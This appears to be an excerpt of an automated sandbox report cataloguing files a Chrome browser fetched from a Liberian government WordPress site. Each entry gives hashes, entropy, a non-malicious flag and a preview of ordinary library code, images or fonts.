                                                                                                                        Preview:(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(t)&&(t=n.get(t)),Array.from(n.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prev
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):4776
                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):68
                                                                                                                        Entropy (8bit):4.148986922130799
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:yionv//thPlE+tJ8/VeyGFFHDhlljp:6v/lhPfA/0y2Vlljp
                                                                                                                        MD5:2A637D3D825673C0E3462FA4ED9A1C5C
                                                                                                                        SHA1:81668D396DA22832D75A986407FF10035E0D5899
                                                                                                                        SHA-256:69539B5B3777CFFDA28A66D7F2AA9B17C91EE1EC8FD50C00C442AF91753A60F7
                                                                                                                        SHA-512:DC7C40381B3D22919E32C1B700CCB77B1B0AEA2690642D01C1AC802561E135C01D5A4D2A0EA18EFC0EC3362E8C549814A10A23563F1F56BD62AEE0CED7E2BD99
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/assets/dummy.png
                                                                                                                        Preview:.PNG........IHDR.....................IDAT.Wc``......h&Y.....IEND.B`.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (20616)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):50836
                                                                                                                        Entropy (8bit):5.668776832803435
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:wBBEnaNQVl3XgnRmBLvcO4zlA9M9OT81h79etCU2:wBBa8e6n8LvePd9Q92
                                                                                                                        MD5:E7CF340F1098CCA24AD1EE821EE6B372
                                                                                                                        SHA1:B7A70F31CF81F8911E8997C1EED18D2A10197476
                                                                                                                        SHA-256:07D68BB85F6EDD4D0E81B1BD56C1E1667A027754C9B7338756C754874FE2BF2B
                                                                                                                        SHA-512:936192EE6E6646B7204C3B0871DAEC5D0EBE75F4D6BEFFB7A84B2BCF73EC0CA3EC96EDFEAC7D33F1FB4AAF295892E4277802449093DBFC9CD8876944D6806AE6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Minified by jsDelivr using Terser v5.7.1.. * Original file: /npm/crypto-js@4.1.1/crypto-js.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,(function(){var t,e,r,i,n,o,s,a,c=c||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&"undefined"!=typeof global&&global.crypto&&(r=global.crypto),!r&&"function"==typeof require)try{r=require("crypto")}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomB
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18
                                                                                                                        Entropy (8bit):3.5724312513221195
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:uZuUeB:u5eB
                                                                                                                        MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                        SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                        SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                        SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:404 page not found
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 80300, version 331.-31392
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):80300
                                                                                                                        Entropy (8bit):7.997228177449401
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:Tek2SzK4WGTQH1GlyGLj3SUwtyIWeOo4XyydPl2mN4fsxDFsbaLsND1Vv08:ak2gTQVGLL7IyDelE7dPZ35FeND19
                                                                                                                        MD5:8E1ED89B6CCB8CE41FAF5CB672677105
                                                                                                                        SHA1:9B592048B9062B00F0B2DD782D70A95B7DC69B83
                                                                                                                        SHA-256:6B555920E358F8A25A422988B448615C33BCCCB4F932E8331CEBFC8E2A737FC7
                                                                                                                        SHA-512:E2F6B4574CB1541DFF6852D0AF44FAAE80286110E8451841EADE4B53EBDF31150602640FE1BDFFF41459EA4AE884D14D115FBC93B30D199C87B88F5D07E4CD72
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fa-solid-900.woff2
                                                                                                                        Preview:wOF2......9...........9R.K.`....................?FFTM....`..N.....`..@.6.$..0..4.. ..+...[2{..2.Q2...L4n.+..;.....E..t..;..J...qe......h.9..u.c..GR....u..C.!...\.Z......8.U.:a.......5/}.:...<;v..3ZE.4..chz....Y,.N#.:..!..~.RQk.b..>L..O..(.!.&.........^.J2D2D2..............n5z..)....%.L.<M...2..Q.K.y.....}...{...v.T...".......N.<..j.......e(..8G..,...\n..\n.\....#.H.i.n...,....F2...5cn5..W.|.FI.....=.:.]ME...d.....-..........-........`.=...O......w..........UN..!Y.D.p.3..j8G.R...}.yY@.n.d.f....Tt|.O.*%..y...Y..........u.~..N.../.8....#r.6j.......hcXyS)....f.~F.Y......=.Q}C...SPA.....@.T...0.\..M..e.....O[VZic}...m..._Y.....n..{.)..[.4D...~94......'.<...1M."..O.....OK......g"..S.Wk.....PJ.H.........+F.GB..!d.180...{.!...n.....)..OKj.6...7&.k.....,..qu.....n;D...<....H]....3.......v...D.....F.F..... .....G..89$.........jj.A.J?.X......C.?..n...B....~b....*)0Dm.k.'.Y....c.7<.K.....|...F.I?o_.....]aAS/.!." ..E....Tod..........n.\.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 430 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):302177
                                                                                                                        Entropy (8bit):7.986583756983097
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:f3uf/e76JtFfIGqqE3dpYHJDXuxpcfrnJovO:Ck+PfnE3YHB+4zT
                                                                                                                        MD5:740C0A91D02E0F3ACB57900A45135E31
                                                                                                                        SHA1:83A528DE71342633E1737896547EDE1E312F466F
                                                                                                                        SHA-256:3A844DAF8165C7AA4E3DA7BD8F39E70AE084DBE7FE075CBFD4FB5277B2378F2D
                                                                                                                        SHA-512:8DE634FC4016230C2989DF585E44E14461BF91C0B39F1AC300F96D057E06E4899984B7B16E89191DB8F6AED95B3C81AE0CE3FC140EAE2F2351CE6AC494DFA8D6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR.............W..!....pHYs.........7......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2024-01-10T13:39:04Z" xmp:MetadataDate="2024-01-17T14:48:47Z" xmp:ModifyDate="2024-01-17T14:48:47Z" xmpMM:InstanceID="xmp.iid:cd57de49-bedf-9944-b0c8-f309874abc15" xmpMM:DocumentID="adobe:docid:photoshop:61f2055f-3be1-6246-81ec-a88ade1d002e" xmpMM:OriginalDocumentID="xmp.did:c7f96fd3-ac37-8d40-a1b3-28639f842cfa" photoshop:ColorMode="3" photos
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (45047), with CRLF line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):165505
                                                                                                                        Entropy (8bit):5.529216472227982
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:x7079mB8Nkhk8fbZNAla86MFzW3c4g7bCizAHu:xY9mB+kK8j7AlhbM0rf
                                                                                                                        MD5:7722BAA787DEC6F4E3831067D4CEA8F8
                                                                                                                        SHA1:ACE1624F275BC847A9B0B6D11DF6284515A6C63F
                                                                                                                        SHA-256:52984E532D02A87A060764FF400626A1B81CC316284A8BA1FEAB5D94697119A0
                                                                                                                        SHA-512:14CFEDC0400368AC4050EC50607C24F7DCCABFF60E02640427EEB18683B248C29D479D7ECD9E6E4B6B2BA228798CBF3809E22AC9E36A87D073E7FB0F153D6786
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13
                                                                                                                        Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 430 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):302177
                                                                                                                        Entropy (8bit):7.986583756983097
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:f3uf/e76JtFfIGqqE3dpYHJDXuxpcfrnJovO:Ck+PfnE3YHB+4zT
                                                                                                                        MD5:740C0A91D02E0F3ACB57900A45135E31
                                                                                                                        SHA1:83A528DE71342633E1737896547EDE1E312F466F
                                                                                                                        SHA-256:3A844DAF8165C7AA4E3DA7BD8F39E70AE084DBE7FE075CBFD4FB5277B2378F2D
                                                                                                                        SHA-512:8DE634FC4016230C2989DF585E44E14461BF91C0B39F1AC300F96D057E06E4899984B7B16E89191DB8F6AED95B3C81AE0CE3FC140EAE2F2351CE6AC494DFA8D6
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1.png
                                                                                                                        Preview:.PNG........IHDR.............W..!....pHYs.........7......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmp:CreateDate="2024-01-10T13:39:04Z" xmp:MetadataDate="2024-01-17T14:48:47Z" xmp:ModifyDate="2024-01-17T14:48:47Z" xmpMM:InstanceID="xmp.iid:cd57de49-bedf-9944-b0c8-f309874abc15" xmpMM:DocumentID="adobe:docid:photoshop:61f2055f-3be1-6246-81ec-a88ade1d002e" xmpMM:OriginalDocumentID="xmp.did:c7f96fd3-ac37-8d40-a1b3-28639f842cfa" photoshop:ColorMode="3" photos
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 20408, version 1.0
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):20408
                                                                                                                        Entropy (8bit):7.990133964311517
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:384:D+h1xN53scre+kLtT5+wpcR98ffVvdSMyNaHAUvLFNPBtn2aotFn9mTCAKDi055c:Ss/XRT5+wpM98ffxd6uZZRXnemWDj5WL
                                                                                                                        MD5:E8730678D4610FA908D3CBA1EF0B4DDF
                                                                                                                        SHA1:1EFCBEE909CE74BF04878D74867F12A1E41AE7A4
                                                                                                                        SHA-256:E921785496ED2D98C2257C88A6F838AFA6ACBEE05CB8467048501BFE2A301461
                                                                                                                        SHA-512:D7C3F81AD11AC5B3E6F454FBBB9BE0940B3E8DA93CDE0B80F9A91A8259966BE466B4D6A0FD5527FCC6C8F218AAD8FFD0124BB29DFA08F6CA658CE49FE9E37E6C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2
                                                                                                                        Preview:wOF2......O...........OA.........................Y..\...?HVAR.F.`?STAT.N'......~.../~......<..d.0.Z.6.$..D. .... ..N..%.....0."S..+.<.D*....|.....Nn.(.{P.Z. .S\.V..R8..:cJQ.9[.5V..r`:*..q+Ln..=.............i..A5....bG+......!.v.p..4H.b.....E.0.$I_\....W.....?....1....MN.........a&.l...+NJ&m.[b..J.Op..l..b.DA....u&.Z.U..............^;.....1...DrC"7..XT..x.X$...)e.:,.O.).C..=...h.G.<Tk.......!...8.X.n......*.uX.h..{.7.@}J;ag.3...{.S.V.....@......Qg."..c|.....L@[...&...R........L.{u.wbC.C.S.....] p.4L]F.@...r.&F..b........u......4IQII5h.lM....'L..!j;),u.Y.CE.{....=.,...C......;.y.......B...D.1..j...lD.6...../m.w&H.<..j6......:......:3..y..e......E>....nu.. .((.......S.l.s.].x1.1..k;WU........!ZK...6Q.@*xEn.%...t).!...p9w...|E..e.v..o........7.I..S..=.]....k.....a-[.ifI.....&...v..K...T4[v):.2E[.C.=5}..e0q......!.....!"......(.TNG.!.....<....[...!.!..b.Du...7...F ..pR.d.pm.......0.B.0............$A......R.....s.8...C...@....g...{.!Jd
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18160
                                                                                                                        Entropy (8bit):7.9507935414647015
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                                        MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                        SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                        SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                        SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (2991)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):3026
                                                                                                                        Entropy (8bit):5.173280130609205
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:Q7A9/XN5NjJE2aAOuRicUKfTGwAuw5BJmVhl2qFqyvQyOw835uuPkSEwVYql+9y7:9314Of1AJ5m/FqyLn8pu4Zl+9y5It4yW
                                                                                                                        MD5:E4A49DF71F8B98C1D9F9D8FCE74D89E8
                                                                                                                        SHA1:B95FCDA0C8C26305AD94E80343D0CFCA8A048A10
                                                                                                                        SHA-256:9D4687A19CAB8F7442A3BDA40C45BE4D10E42488E091DDD706C3CAED83C3EE1F
                                                                                                                        SHA-512:42CD5F854779886F24C43ED14617380110C946D1B430B454060C3B391DE6FBAE6D0ED8AB7CDD7CFDC9726B2D6142A4E01C4448E36088DFCEE7FDD00B60909F89
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/comment-reply.min.js?ver=6.7.1
                                                                                                                        Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);function t(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode&&"a"!==E.activeElement.tagName.toLowerCase())return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1}C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);e=E.getElementsByClassName
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1432)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1540
                                                                                                                        Entropy (8bit):5.112255512062075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:zXAkLOB0pCXKBgHKfiVfNgnKBggKfiVfNU:zxQ3JHoJga
                                                                                                                        MD5:78A582571F88D7D9D7443423712E80B2
                                                                                                                        SHA1:53B9B049DA924B291C9BC7F988EBB46F6A9CC227
                                                                                                                        SHA-256:C24A7908E8BCCFB36947DE91AB342F33F1C966B31F50ED1FB83D9D8B3D579A1F
                                                                                                                        SHA-512:BA52A08F030DAA609543CC3528BA87B2F65CBC1E20C4133DAF060E17518FC7B1AA87DD37B470984E91DBB44DF6521C09DB76B8C5BDFA774B01B3046A937C023B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Parallax. * enllax.js. * 1.1.0 | copyright 2015, MMK Jony | https://github.com/mmkjony/enllax.js. */.!function(t){"use strict";t.fn.enllax=function(r){var a=t(window).height(),n=t(document).height(),o=t.extend({ratio:0,type:"background",direction:"vertical"},r),e=t("[data-enllax-ratio]");e.each(function(){var r,e,s,i=t(this),c=i.offset().top,l=i.outerHeight(),p=i.data("enllax-ratio"),d=i.data("enllax-type"),x=i.data("enllax-direction");r=p?p:o.ratio,e=d?d:o.type,s=x?x:o.direction;var f=Math.round(c*r),u=Math.round((c-a/2+l)*r);"background"==e?"vertical"==s?i.css({"background-position":"center "+-f+"px"}):"horizontal"==s&&i.css({"background-position":-f+"px center"}):"foreground"==e&&("vertical"==s?i.css({"-webkit-transform":"translateY("+u+"px)","-moz-transform":"translateY("+u+"px)",transform:"translateY("+u+"px)"}):"horizontal"==s&&i.css({"-webkit-transform":"translateX("+u+"px)","-moz-transform":"translateX("+u+"px)",transform:"translateX("+u+"px)"})),t(window).on("scroll",fu
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (13479)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):13577
                                                                                                                        Entropy (8bit):5.272065782731947
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18
                                                                                                                        Entropy (8bit):3.5724312513221195
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:uZuUeB:u5eB
                                                                                                                        MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                        SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                        SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                        SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:404 page not found
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (20618)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):50839
                                                                                                                        Entropy (8bit):5.6683383182408384
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:oBVGnaNQVl3XgnRmBLvcO4zlA9M9OT81h79etCUS:oBVA8e6n8LvePd9Q9S
                                                                                                                        MD5:24E902067369DE547121BAB3951B0583
                                                                                                                        SHA1:939D6CDD550FC1D5E36C5379458C078DD724AFD4
                                                                                                                        SHA-256:DF6FE4366AF4E9E7576583B25CB34098E9E2F616F36E2B61D6B7D99DF68612E5
                                                                                                                        SHA-512:8F8A68680B1AC64BF2AE14C54274D492E5DC93BC83D8A075A89C78763E3F5BC2B1A6F069FF7676590F471A779953B9FC144B88A5422366B70605E7618A494F5B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js
